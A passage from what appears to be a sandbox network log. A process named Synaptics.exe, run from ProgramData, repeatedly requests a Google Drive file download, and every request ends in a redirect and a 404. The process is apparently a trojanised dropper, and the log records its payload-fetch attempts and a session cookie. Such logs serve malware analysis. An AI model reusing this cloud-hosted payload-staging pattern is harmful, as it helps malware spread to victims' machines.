                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.7 | 59942 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:33 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:33 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:33 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-z03RpEi8gpm1NMt2i_BlGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.7 | 59944 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:58:33 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
2024-12-30 09:58:33 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5n-tmSR7Zn0upDr1WBwhYoNb2yQBYI-SvCAxECqeEIAVTrz67dMkPJJ5FGXEfKToGPGCbQRls
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:33 GMT
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-T-uNSELM5p0B4HiFDjPHxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:33 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:33 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="tZcwGytT7BYZk5SlNecpdw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:33 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                85 | 192.168.2.7 | 59943 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:33 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:33 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:33 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-WUwcV_hV_Ln9U-E-UVnewg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                86 | 192.168.2.7 | 59956 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:34 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:34 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC6ZXv9oNA7Y-XZZJe4OeASFJx4NvYgDwSWz1CVJWNUwbhfMXnCBpTNlZAOqJcARLAB3Rk0aL2Q
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:34 GMT
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-94vaIbHcTthzyZy8agROgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:34 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:34 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="urUe7b6uajIg4i8xeSVp_g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:34 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                87 | 192.168.2.7 | 59958 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:34 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:34 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:34 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-fHbdN5Aqh9gG5dptw8ONlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                88 | 192.168.2.7 | 59957 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:34 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:34 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:34 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-zvOHNI7XfFrPmIapWmbqJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                89 | 192.168.2.7 | 59959 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:34 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:34 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC78QJF3O3hjFSacub5RmmcHZ1r6YcvBnD8EUKuvemVrQ3i6gw82M25-vZ0NLyIU5pVEC_zKMbw
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:34 GMT
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-0RJjXbhLdygUQh5Ppi2LIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:34 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:34 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="qdSfcjIpB_ko5oGRf4hyzA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:34 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                90 | 192.168.2.7 | 59966 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:35 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:35 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-P_kZwKfip6faIlLIpXdc4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                91 | 192.168.2.7 | 59967 | 216.58.206.46 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:35 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:35 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-coP2FndCazkh8agLcosYuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                92 | 192.168.2.7 | 59968 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:35 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:35 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5H7VPPxE1aLTw5eb0_0wtzu6agzQYpdHIMasVasZAQxWHZqJXlQtoDd6UOQUZ1WGcxT6GQoLg
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:35 GMT
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-_HQAEjjrF5oeJIO3Vtgmmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
